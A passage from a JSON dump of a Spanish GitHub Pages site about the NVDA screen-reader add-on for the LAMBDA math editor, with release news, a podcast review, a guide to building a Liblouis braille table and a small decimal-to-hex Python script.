LAMBDA con NVDA en español con la que nació esta web será transferida a NVDA.es. Seguiremos informando y para finalizar aclaramos que no cambiarán las personas que están detrás de este proyecto. Gracias por el apoyo, y sobre todo, por el uso de nuestro trabajo.</p>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/\" class=\"u-url\">Ya está aquí la versión 1.2.0 del complemento para LAMBDA\"</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-08-10T10:23:20+02:00\" title=\"2017-08-10 10:23\">2017-08-10 10:23</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>La versión 1.2.0 ya se puede descargar desde el sitio oficial de complementos. Esta versión añade las traducciones para búlgaro, francés, rumano y serbio, además de actualizar las traducciones española y gallega. Asimismo la traducción italiana se ha transferido al responsable del idioma en el equipo de traducción, de forma que se podrían detectar cambios.</p>\n<p>disfrutad esta versión.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/\" class=\"u-url\">Liberada la versión 1.1.8 del complemento para LAMBDA, primera versión estable</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/liberada-la-version-118-del-complemento-para-lambda-primera-version-estable/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-06-19T12:25:53+02:00\" title=\"2017-06-19 12:25\">2017-06-19 12:25</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Hoy día 19 de junio, como estaba previsto, ha sido liberada al público la versión 1.1.8 del complemento para LAMBDA, descargable desde <a href=\"https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon\">https://github.com/lambda-nvda/lambdaNvda/releases/download/latest/lambda.nvda-addon</a>.\nEn cuanto llegue el complemento al repositorio de traductores en Assembla se actualizarán las traducciones. La traducción de los mensajes está actualizada, pero la de la documentación es la que necesita ser comparada y traducida para estar en consonancia con la original en inglés.\nDesde aquí continuaremos trabajando dando soporte a la tabla braille española y a las traducciones española y gallega.</p>\n<p>Con esta versión, al fin, se culmina un trabajo de varias personas desde septiembre que ha conseguido igualar el soporte para LAMBDA de NVDA al de Jaws.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/\" class=\"u-url\">Actualizadas traducciones: añadida traducción para el mensaje de alerta de perfil lambda existente</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/actualizadas-traducciones-anadida-traduccion-para-el-mensaje-de-alerta-de-perfil-lambda-existente/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-27T13:23:02+02:00\" title=\"2017-05-27 13:23\">2017-05-27 13:23</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>En el día de hoy se ha enviado la pull request al repo oficial para incluír en la versión inestable (rama master) las últimas traducciones (español y gallego). En ambos idiomas se ha traducido el diálogo que avisa de que un perfil llamado lambda ya existe (en su nueva versión). se recuerda a los usuarios que la versión dev en el sitio de complementos no incluye traducciones. Para descargar una con ellas está disponible un enlace en [la web de la <a href=\"https://nvdaes.github.io\">comunidad hispanohablante</a>. También puedes compilar uno si cuentas con las herramientas necesarias, descritas en la documentación de desarrollo de complementos de NVDA.\nEsta será probablemente la última traducción que se envíe por este método, ya que cuando se declare una versión estable las traducciones pasarán a administrarse a través del repositorio de la comunidad de traductores.</p>\n<p>Seguiremos informando.</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/\" class=\"u-url\">Proceso de construcción de una tabla braille para el complemento</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-25T09:12:09+02:00\" title=\"2017-05-25 09:12\">2017-05-25 09:12</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Nota: Este post ha sido construido a partir de la información proporcionada por Alberto Zanella y nuestra experiencia propia construyendo esta tabla.</p>\n<p>Tenía en mente hacer algo como este post dese hace unos días, en inglés o español. Dado que la intención de este complemento es que se expanda a los más idiomas posibles, hago este manual para que cada uno pueda hacer la tabla en el suyo a partir del .jbt de los scripts de Jaws. Como el sitio es en español, no quedará más remedio que hacerla en ese idioma, google Translate is your friend.</p>\n<ol>\n<li>\n<p>Localizamos la tabla LambdaX.jbt en Inicio>Jaws X.Y>Explorar archivos de Jaws>Explorar archivos de programa o en C:\\Archivos de programa\\Freedom Scientific\\Jaws\\X.Y, donde X es la versión mayor (16, 17, 18, etc.) e Y la menor (normalmente 0, pero puede variar, sobre todo para versiones anteriores a Jaws8). En esa tabla encontraremos una lista de signos como la que sigue:</p>\n<p>\\1 = 123</p>\n<p>\\2 = 456</p>\n<p>\\3 = 567</p>\n</li>\n<li>\n<p>Tenemos que convertir los números a la izquierda de la tabla a hexadecimal, que es lo que usa Liblouis, que es el motor braille de NVDA. Para ello podemos usar el `<a href=\"linked_files/dec_to_hex.py\">script dec2hex por José Manuel Delicado</a>. Podemos ejecutar en Python:</p>\n<pre class=\"code literal-block\"><span></span><span class=\"kn\">import</span> <span class=\"nn\">dec_to_hex</span>\n<span class=\"n\">dec_to_hex</span><span class=\"o\">.</span><span class=\"n\">procesar</span><span class=\"p\">(</span><span class=\"s2\">\"LambdaX.jbt\"</span><span class=\"p\">)</span>\n</pre>\n\n\n<p>Esto devolverá un txt en el mismo sitio donde se ejecutó el código llamado LambdaX.txt con el mismo formato pero con números hexadecimales en lugar de decimales a la izqueirda. En ambas, lo que figura a la derecha son los patrones de puntos. En las tablas de Liblouis encontraremos un formato algo diferente: categoría símbolo/representación-hexadecimal(\\X0000, por ejemplo \\X001a, después de la X van cuatro caracteres, si no se llega a ese número rellenar con ceros a la izquierda, por ejemplo para el carácter anterior 1a se ponen dos ceros de forma que \\X001a) patrón-puntos.</p>\n</li>\n<li>\n<p>Una vez se han convertido, queda el trabajo más arduo. Comparar los valores de puntos de la tabla de NVDA con los de Jaws. Para eso necesitamos descargar las tablas de Liblouis. Con Git (si no tienes Git, recomendable descargarlo), ejecutar desde la consola:</p>\n<pre class=\"code literal-block\"><span></span>git clone https://github.com/liblouis/liblouis\n</pre>\n\n\n<p>Obtendremos una carpeta llamada Liblouis. Dentro de ella iremos a tables y buscaremos la nuestra, normalmente algo así como X_G0.utb (las G1 son de 6 puntos y no nos interesan) o X-8.utb/X-8dots.utb. Para incluirla en el addon y testearla, necesitamos bajarlo, también usando Git, ejecutando:</p>\n<pre class=\"code literal-block\"><span></span>git clone https://github.com/nvdaaddons/lambda\n</pre>\n\n\n<p>Tendremos una carpeta \"lambda\". Tendremos que entrar y navegad a ddon>appModules>LAMBDA>brailleTables. Pegamos la tabla que copiamos desde la carpeta tables de Liblouis y la renombramos al estilo de los archivos que ya están en esa carpeta (lambda-X.utb).</p>\n</li>\n<li>\n<p>Primero deberíamos comprobar los include de la tabla, haciendo una búsqueda con la función buscar del editor con que la abramos (se recomienda Notepad++). Si el include hace referencia a un archivo que no está en la carpeta brailleTables que tendremos abierta en otra ventana debemos buscar ese archivo en Liblouis (por lo general en la carpeta tables) y pegarlo, sin cambiar el nombre, para que la tabla pueda utilizar las dependencias que necesite. En el caso de nuestra tabla, la española, no fue necesario ya que todas las dependencias de la española las requería también la italiana que ya estaba hecha.</p>\n</li>\n<li>\n<p>Después, se empiezan a verificar todos los símbolos (obviando ciertas categorías, como letras o números, aunque si las cotejamos no debería llevarnos más de 3 horas toda la tabla). Recomiendo ir marcando en el txt que generó el script en el paso 2 (con * o lo que nos sea más cómodo) los símbolos que ya hayamos verificado, luego nos será útil a la hora de añadir aquellos símbolos que falten. Debemos modificar los puntos de aquellos símbolos que estén mal primero, y posteriormente añadir todos los que no figuran en la tabla. En este punto yo personalmente al hacer la tabla no fui demasiado meticuloso, asigné a todos la categoría math y no puse descripción porque los que hicieron la tabla de Jaws se ve que tampoco tenían demasiado tiempo como para ponerse a mirar qué era cada símbolo y ponerlo como comentario. Para añadir símbolos, por ejemplo, si en el txt tenemos b1 345678 podemos poner: math \\X00b1 345678.</p>\n</li>\n<li>\n<p>Si has hecho todo esto con éxito, felicidades, lo esencial está completado. Necesitas probar la tabla con NVDA o con lou_debug, lo que esté a tu alcance. Desconozco si hay versión de Liblouis para instalar en windows, pero para Linux la hay y me fue muy útil a la hora de depurar errores en la tabla. Si tenéis por ahí un servidor o máquina virtual solo es cosa de bajarse Liblouis o el código (si es el código compilarlo con make && make install) y pasaros a la MV o servidor el utb. Después de eso:</p>\n<pre class=\"code literal-block\"><span></span>lou_debug LambdaX.utb\n</pre>\n\n\n<p>Entonces debería decir qué errores ha encontrado y la línea. Para ir a una línea X en el Notepad++ podemos usar Ir a la línea... en el menú buscar (ctrl+G). Si no tienes lou_debug o alguna herramienta de depuración de Liblouis a tu alcance, te tocará hacerlo de la forma chapuza, a mano. A mí me dio demasiada pereza ponerme a verificar qué había hecho mal (además de que seguramente algunos errores no sería capaz de encontrarlos) y busqué, en su lugar, lo de la depuración en Liblouis que cuento al principio de este paso. <!-- ToDo: Mirar si hay debugging para windows y especificarlo.--></p>\n</li>\n<li>\n<p>Si has depurado todos los errores, enhorabuena, tu tabla debería funcionar con el complemento. compila el complemento si tienes las herramientas necesarias (solo tecla scons en una ventana del símb del sistema u otra consola debidamente configurada), o añade el utb en %appdata%\\nvda\\addons\\lambda\\appModules\\LAMBDA\\brailleTables. Reinicia NVDA.</p>\n</li>\n<li>\n<p>Una vez que no haya ningún error ponte en contacto con el autor o envía una pull request al repo nvdaaddons/lambda de GitHub con la tabla para que la incluya (cómo enviar pull requests en GitHub está fuera del propósito de este documento). Si la acepta, no olvides ponerte en contacto con el traductor del idioma (o de los idiomas) a los que corresponde tu tabla para avisarle de que la haga predeterminada para todos los que instalen el complemento en ese/esos idioma/s. Si no sabes el traductor de tu idioma busca y subscríbete a la lista de traducciones de NVDA; allí podrás preguntar. Tambien puedes hacer de detective y mirar quién hace commits en tu/s idioma/s en el repo screenReaderTranslations de assembla.com.</p>\n</li>\n</ol>\n<p>Y esto es todo, no tiene mucho más. Gracias por tragaros el tocho. Ah, y suerte.\n<strong><em>La tabla españoala fue construída ena colaboración entre José Manuel Delicado, Salva Doménech y yo, con el autor. Agradecimiento especial a José Enrique Fernández del Campo por sus detallados reportes de errores que intentamos corregir antes de la publicación de la tabla.</em></strong></p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/podcast-y-resena-sobre-lambda-con-nvda-en-el-sitio-web-de-la-comunidad-hispanohablante/\" class=\"u-url\">Podcast y reseña sobre LAMBDA con NVDA en el sitio web de la comunidad hispanohablante</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil-a-partir-de-lo-publicado-por-salva-domenech-miguel-con-la-colaboracion-de-noelia-rm/\">Iván Novegil (a partir de lo publicado por Salva Doménech Miguel con la colaboración de Noelia R.M.)</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/podcast-y-resena-sobre-lambda-con-nvda-en-el-sitio-web-de-la-comunidad-hispanohablante/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-24T18:17:04+02:00\" title=\"2017-05-24 18:17\">2017-05-24 18:17</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <div>\n<p>Es cierto que desde hace bastante tiempo, unos 4 años calculando a ojo, NVDA soportaba, mediante un plugin chapuza, la lectura del editor Lambda. También es cierto que ONCE intentó, mediante este plugin,, que debía ejecutarse en un portable y recomendaban ejecutar en una máquina virtual de Windows XP en VirtualBox (que yo llegué a tener cuando Windows 8 empezó a expandirse), potenciarlo; pero no es menos cierto que como ya comenté, el plugin (creo que de autor desconocido) era chapucero. Era inestable, el soporte no era completo y además debía utilizarse una versión portable de NVDA con ese plugin instalado a mano y a ser posible nada más a riesgo de que interfiriera con otros complementos. No sé si algún asiduo usuario de Lambda pudo probar esto, la verdad es que yo no llegué a usarlo, ni en dos ocasiones, pero casi juraría que no ofrecía soporte braille en ningún idioma</p>\n<p>Bien, supongo que encontrándose en la situación que comenté arriba, y sin ganas de comprar un JAWS o llamémosle x a la razón por la que lo hizo, en septiembre el autor de este complemento, Alberto Zanella, decidió solicitar una revisión. No recuerdo ahora si la pasó o no, creo que se le comentaron un par de cosas a mejorar, pero desapareció de la faz de la tierra.</p>\n<p>Algunos, como Iván Novegil, José Enrique Fernández del Campo, o sin ir más lejos yo mismo; manifestamos la utilidad que veíamos a esto. Durante mucho tiempo la versión compartida por Alberto era la que había, con traducciones a castellano creo recordar gracias a la ayuda de miembros de la comunidad y con tablas braille en italiano. No se volvió a saber casi de él y no se llegó a saber tampoco bien del todo como solucionar el tema de las tablas braille.</p>\n<p>A principios de mayo, el autor volvió a aparecer, respondiendo a algunas isues de Github de Iván. La cosa volvió a ponerse en marcha con la aparición también de José manuel Delicado, de manera que la historia termina con un trabajo brutal en algo así como 3 semanas. Un trabajo brutal en el que se han mejorado incidencias como la mejora de algunas pronunciaciones, la dición de nuevos elementos a pronunciar (las coordenadas de las celdillas de una matriz, por ejemplo), y la mejora más evidente: el soporte braille completo con una tabla en castellano. Y en este sentido sí creo que es muy importante agradecer infinitamente a Iván Novegil, a José Manuel Delicado, a José Enrique Fernández del Campo y obviamente al autor, por este trabajo tan excelente y en tiempo récord para obtener un complemento casi publicado al 100% y con muy pocos fallos que solucionar.</p>\n<p>Creo que toda la comunidad y en general todos los usuarios y usuarias del lector y sobre todo del editor matemático lambda solo podemos estar agradecidos, muy, agradecidos, por este maravilloso trabajo. Quedan algunos fallos por pulir (como la desubicación del braille al navegar por una línea con sensores o algunos signos que no semuestran) pero algunos de estos son del propio Lambda y las nuevas versiones de Windows.</p>\n<p>En definitiva, creo que podemos estar contentos si decimos que el soporte es similar al que ofrece JAWS con sus correspondientes scripts como así podéis comprobar en el podcast enlazado en esta entrada.</p>\n<p>Es muy probable que en el futuro inmediato, las próximas versiones del addon ya no presenten algunos errores de los que doy cuenta en él.</p>\n<h4>Podcast sobre Lambda</h4>\n<p><audio controls>\n <source src=\"https://s.juventudelatina.com/juvenube/index.php/s/KtyR7zeybfI7uRL/download\" type=\"audio/mpeg\">\nTu navegador no admite la reproducción de este podcast.\n</source></audio></p>\n<p><a href=\"https://s.juventudelatina.com/juvenube/index.php/s/KtyR7zeybfI7uRL/download\">Descargar podcast</a></p>\n<h4>Referencias</h4>\n<h5>Contenido matemático del podcast</h5>\n<ul>\n<li><a href=\"https://nvdaes.github.io/linkedFiles/salvaPrueba.lambda\">Descargar fichero Lambda</a></li>\n<li><a href=\"https://nvdaes.github.io/linkedFiles/salvaPrueba.html\">Ver en formato HTML</a></li>\n</ul>\n<p>Nota: Para explorar el fichero anterior con Firefox o Internet Explorer, puedes instalar <a href=\"http://www.dessci.com/en/products/mathplayer/\">MathPlayer</a></p>\n<p>Para más información, consulta la sección \"Leyendo Contenido Matemático\" en la guía de NVDA.</p>\n<h5>Lambda y su complemento</h5>\n<ul>\n<li><a href=\"https://addons.nvda-project.org/addons/lambda.es.html\">Página del complemento de NVDA</a></li>\n<li><a href=\"http://www.lambdaproject.org/home\">Proyecto Lambda</a></li>\n<li>\n<a href=\"ftp://ftp.once.es/pub/utt/tiflosoftware/Miscelanea/LambdaSetup140.zip\">Descargar Lambda</a> (archivo del CIDAT)</li>\n</ul>\n<p>copiado del original en [https://nvdaes.github.io/Lambda-con-NVDA/]</p>\n</div>\n </div>\n </article><article class=\"h-entry post-text\"><header><h1 class=\"p-name entry-title\"><a href=\"a/bienvenidos-a-la-web-de-lambda-nvda-esp/\" class=\"u-url\">bienvenidos a la web de LAMBDA-NVDA-esp</a></h1>\n <div class=\"metadata\">\n <p class=\"byline author vcard\"><span class=\"byline-name fn\" itemprop=\"author\">\n <a href=\"authors/ivan-novegil/\">Iván Novegil</a>\n </span></p>\n <p class=\"dateline\"><a href=\"a/bienvenidos-a-la-web-de-lambda-nvda-esp/\" rel=\"bookmark\"><time class=\"published dt-published\" datetime=\"2017-05-24T17:43:03+02:00\" title=\"2017-05-24 17:43\">2017-05-24 17:43</time></a></p>\n </div>\n </header><div class=\"e-content entry-content\">\n <p>Pues eso, bienvenidos. Podéis obtener más información sobre nosotros <a href=\"p/about\">aquí</a></p>\n </div>\n </article>\n</div>\n\n\n\n\n\n\n\n </div>\n <!--End of body content-->\n\n <footer id=\"footer\">\n Contents © 2017 <a href=\"mailto:[email protected]\">Organización de GitHub lambda-nvda-esp</a> - Powered by <a href=\"https://getnikola.com\" rel=\"nofollow\">Nikola</a> \n \n </footer>\n</div>\n</div>\n\n\n <script src=\"assets/js/all-nocdn.js\"></script><script src=\"assets/js/colorbox-i18n/jquery.colorbox-es.js\"></script><script>$('a.image-reference:not(.islink) img:not(.islink)').parent().colorbox({rel:\"gal\",maxWidth:\"100%\",maxHeight:\"100%\",scalePhotos:true});</script><!-- fancy dates --><script>\n moment.locale(\"es\");\n fancydates(0, \"YYYY-MM-DD HH:mm\");\n </script><!-- end fancy dates -->\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.7725606560707092,
"alphanum_fraction": 0.78398197889328,
"avg_line_length": 121.29310607910156,
"blob_id": "6bb36472a85a47acce5bbcfff9e3a8f138129f9c",
"content_id": "507db88f91792e8a47987c732b470205ca2a694f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7196,
"license_type": "no_license",
"max_line_length": 922,
"num_lines": 58,
"path": "/a/proceso-de-construccion-de-una-tabla-braille-para-el-complemento/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: Proceso de construcción de una tabla braille para el complemento\n.. slug: proceso-de-construccion-de-una-tabla-braille-para-el-complemento\n.. date: 2017-05-25 09:12:09 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nNota: Este post ha sido construido a partir de la información proporcionada por Alberto Zanella y nuestra experiencia propia construyendo esta tabla.\n\nTenía en mente hacer algo como este post dese hace unos días, en inglés o español. Dado que la intención de este complemento es que se expanda a los más idiomas posibles, hago este manual para que cada uno pueda hacer la tabla en el suyo a partir del .jbt de los scripts de Jaws. Como el sitio es en español, no quedará más remedio que hacerla en ese idioma, google Translate is your friend.\n\n1. Localizamos la tabla LambdaX.jbt en Inicio>Jaws X.Y>Explorar archivos de Jaws>Explorar archivos de programa o en C:\\Archivos de programa\\Freedom Scientific\\Jaws\\X.Y, donde X es la versión mayor (16, 17, 18, etc.) e Y la menor (normalmente 0, pero puede variar, sobre todo para versiones anteriores a Jaws8). En esa tabla encontraremos una lista de signos como la que sigue:\n\n\t\\1 = 123\n\n\t\\2 = 456\n\n\t\\3 = 567\n\n2. Tenemos que convertir los números a la izquierda de la tabla a hexadecimal, que es lo que usa Liblouis, que es el motor braille de NVDA. Para ello podemos usar el `[script dec2hex por José Manuel Delicado](/linked_files/dec_to_hex.py). Podemos ejecutar en Python:\n\n\t\timport dec_to_hex\n\t\tdec_to_hex.procesar(\"LambdaX.jbt\")\n\n\tEsto devolverá un txt en el mismo sitio donde se ejecutó el código llamado LambdaX.txt con el mismo formato pero con números hexadecimales en lugar de decimales a la izqueirda. En ambas, lo que figura a la derecha son los patrones de puntos. En las tablas de Liblouis encontraremos un formato algo diferente: categoría símbolo/representación-hexadecimal(\\X0000, por ejemplo \\X001a, después de la X van cuatro caracteres, si no se llega a ese número rellenar con ceros a la izquierda, por ejemplo para el carácter anterior 1a se ponen dos ceros de forma que \\X001a) patrón-puntos.\n\n3. Una vez se han convertido, queda el trabajo más arduo. Comparar los valores de puntos de la tabla de NVDA con los de Jaws. Para eso necesitamos descargar las tablas de Liblouis. Con Git (si no tienes Git, recomendable descargarlo), ejecutar desde la consola:\n\n\t\tgit clone https://github.com/liblouis/liblouis\n\n\tObtendremos una carpeta llamada Liblouis. Dentro de ella iremos a tables y buscaremos la nuestra, normalmente algo así como X_G0.utb (las G1 son de 6 puntos y no nos interesan) o X-8.utb/X-8dots.utb. Para incluirla en el addon y testearla, necesitamos bajarlo, también usando Git, ejecutando:\n\n\t\tgit clone https://github.com/nvdaaddons/lambda\n\n\tTendremos una carpeta \"lambda\". Tendremos que entrar y navegad a ddon>appModules>LAMBDA>brailleTables. Pegamos la tabla que copiamos desde la carpeta tables de Liblouis y la renombramos al estilo de los archivos que ya están en esa carpeta (lambda-X.utb).\n\n4. Primero deberíamos comprobar los include de la tabla, haciendo una búsqueda con la función buscar del editor con que la abramos (se recomienda Notepad++). Si el include hace referencia a un archivo que no está en la carpeta brailleTables que tendremos abierta en otra ventana debemos buscar ese archivo en Liblouis (por lo general en la carpeta tables) y pegarlo, sin cambiar el nombre, para que la tabla pueda utilizar las dependencias que necesite. En el caso de nuestra tabla, la española, no fue necesario ya que todas las dependencias de la española las requería también la italiana que ya estaba hecha.\n\n5. Después, se empiezan a verificar todos los símbolos (obviando ciertas categorías, como letras o números, aunque si las cotejamos no debería llevarnos más de 3 horas toda la tabla). Recomiendo ir marcando en el txt que generó el script en el paso 2 (con * o lo que nos sea más cómodo) los símbolos que ya hayamos verificado, luego nos será útil a la hora de añadir aquellos símbolos que falten. Debemos modificar los puntos de aquellos símbolos que estén mal primero, y posteriormente añadir todos los que no figuran en la tabla. En este punto yo personalmente al hacer la tabla no fui demasiado meticuloso, asigné a todos la categoría math y no puse descripción porque los que hicieron la tabla de Jaws se ve que tampoco tenían demasiado tiempo como para ponerse a mirar qué era cada símbolo y ponerlo como comentario. Para añadir símbolos, por ejemplo, si en el txt tenemos b1 345678 podemos poner: math \\X00b1 345678.\n\n6. Si has hecho todo esto con éxito, felicidades, lo esencial está completado. Necesitas probar la tabla con NVDA o con lou_debug, lo que esté a tu alcance. Desconozco si hay versión de Liblouis para instalar en windows, pero para Linux la hay y me fue muy útil a la hora de depurar errores en la tabla. Si tenéis por ahí un servidor o máquina virtual solo es cosa de bajarse Liblouis o el código (si es el código compilarlo con make && make install) y pasaros a la MV o servidor el utb. Después de eso:\n\n\t\tlou_debug LambdaX.utb\n\n\tEntonces debería decir qué errores ha encontrado y la línea. Para ir a una línea X en el Notepad++ podemos usar Ir a la línea... en el menú buscar (ctrl+G). Si no tienes lou_debug o alguna herramienta de depuración de Liblouis a tu alcance, te tocará hacerlo de la forma chapuza, a mano. A mí me dio demasiada pereza ponerme a verificar qué había hecho mal (además de que seguramente algunos errores no sería capaz de encontrarlos) y busqué, en su lugar, lo de la depuración en Liblouis que cuento al principio de este paso. <!-- ToDo: Mirar si hay debugging para windows y especificarlo.-->\n\n7. Si has depurado todos los errores, enhorabuena, tu tabla debería funcionar con el complemento. compila el complemento si tienes las herramientas necesarias (solo tecla scons en una ventana del símb del sistema u otra consola debidamente configurada), o añade el utb en %appdata%\\nvda\\addons\\lambda\\appModules\\LAMBDA\\brailleTables. Reinicia NVDA.\n\n8. Una vez que no haya ningún error ponte en contacto con el autor o envía una pull request al repo nvdaaddons/lambda de GitHub con la tabla para que la incluya (cómo enviar pull requests en GitHub está fuera del propósito de este documento). Si la acepta, no olvides ponerte en contacto con el traductor del idioma (o de los idiomas) a los que corresponde tu tabla para avisarle de que la haga predeterminada para todos los que instalen el complemento en ese/esos idioma/s. Si no sabes el traductor de tu idioma busca y subscríbete a la lista de traducciones de NVDA; allí podrás preguntar. Tambien puedes hacer de detective y mirar quién hace commits en tu/s idioma/s en el repo screenReaderTranslations de assembla.com.\n\n\nY esto es todo, no tiene mucho más. Gracias por tragaros el tocho. Ah, y suerte.\n***La tabla españoala fue construída ena colaboración entre José Manuel Delicado, Salva Doménech y yo, con el autor. Agradecimiento especial a José Enrique Fernández del Campo por sus detallados reportes de errores que intentamos corregir antes de la publicación de la tabla.***"
},
{
"alpha_fraction": 0.5710955858230591,
"alphanum_fraction": 0.6037296056747437,
"avg_line_length": 25.875,
"blob_id": "af2ec2e43585585da304ba1c44ca87f49301b897",
"content_id": "41a1f975f6ad8ef18aadffa74b1c29d78f836437",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 16,
"path": "/linked_files/dec_to_hex.py",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\ndef procesar(file):\n\tf1=open(file, \"r\")\n\tcontenido=f1.read()\n\tf1.close()\n\tlineas=contenido.split(\"\\n\")\n\tf2=open(file+\".txt\", \"w\")\n\tfor linea in lineas:\n\t\tif linea.find(\"=\")==-1:\n\t\t\tcontinue #pasamos a la siguiente\n\t\tl=linea.split(\"=\")\n\t\tl[0]=l[0].replace(\"\\\\\", \"\") #quitamos la barra invertida\n\t\tl[0]=format(int(l[0]), \"x\") #convertimos de decimal a hexadecimal\n\t\tf2.write(l[0]+\" \"+l[1]+\"\\n\")\n\tf2.close()"
},
{
"alpha_fraction": 0.7061538696289062,
"alphanum_fraction": 0.7476922869682312,
"avg_line_length": 42.33333206176758,
"blob_id": "158caeda62c1bac70f43f2bf4c75798060c95d50",
"content_id": "d98be8056a67b4db801a32a4e497495f00cc5686",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 664,
"license_type": "no_license",
"max_line_length": 358,
"num_lines": 15,
"path": "/a/ya-esta-aqui-la-version-120-del-complemento-para-lambda/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!--\n.. title: Ya está aquí la versión 1.2.0 del complemento para LAMBDA\"\n.. slug: ya-esta-aqui-la-version-120-del-complemento-para-lambda\n.. date: 2017-08-10 10:23:20 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n.. author: Iván Novegil\n-->\n\nLa versión 1.2.0 ya se puede descargar desde el sitio oficial de complementos. Esta versión añade las traducciones para búlgaro, francés, rumano y serbio, además de actualizar las traducciones española y gallega. Asimismo la traducción italiana se ha transferido al responsable del idioma en el equipo de traducción, de forma que se podrían detectar cambios.\n\ndisfrutad esta versión.\n"
},
{
"alpha_fraction": 0.7542955279350281,
"alphanum_fraction": 0.769759476184845,
"avg_line_length": 54.47618865966797,
"blob_id": "7a4f186c5fa59a483db788e7735700770c2f72a1",
"content_id": "44b3bc3eb700800dcee57df68baa432c10568cb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 430,
"num_lines": 21,
"path": "/p/about/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
"text": "<!-- \n.. title: sobre Nosotros\n.. slug: about\n.. date: 2017-05-24 17:34:47 UTC+02:00\n.. tags: \n.. category: \n.. link: \n.. description: \n.. type: text\n-->\n\nBienvenidos a la página web de la organización lambda-nvda-esp en GitHub.\n\n## ¿Qué hacemos?\n\nconjunto de usuarios españoles de LAMBDA con NVDA o desarrolladores de Python centrados en la mejora y expansión del uso del editor matemático [LAMBDA](https://lambdaproject.org) (Linear Access to Mathematics using Braille Display and Audio Synthesis) con el lector de pantalla gratuito y de código abierto [NVDA](https://nvaccess.org) (Non-visual Desktop Access) en el idioma español o los diferentes idiomas oficiales en España.\nEste sitio servirá como tablón de anuncios y lugar para seguir las actualizaciones a las traducciones y ampliaciones a la tabla braille, debido a que tanto traductores como desarrolladores de la tabla braille estamos en esta organización de GitHub.\n\n## Contacto\n\nPara ponerte en contacto con nosotros puedes suscribirte a [la lista en inglés sobre LAMBDA con NVDA](https://groups.google.com/group/lambda-nvda) o enviar un correo al propietario de la lista en [[email protected]](mailto:[email protected])."
},
{
"alpha_fraction": 0.7128851413726807,
"alphanum_fraction": 0.7549019455909729,
"avg_line_length": 50.03571319580078,
"blob_id": "7b183e40cec7571a4a564a795a2de15b9562f109",
"content_id": "9f333558a635017e484e190dc22a3c93984bbbe1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 382,
"num_lines": 28,
"path": "/p/distribuidores/index.md",
"repo_name": "lambda-nvda-esp/lambda-nvda-esp.github.io",
"src_encoding": "UTF-8",
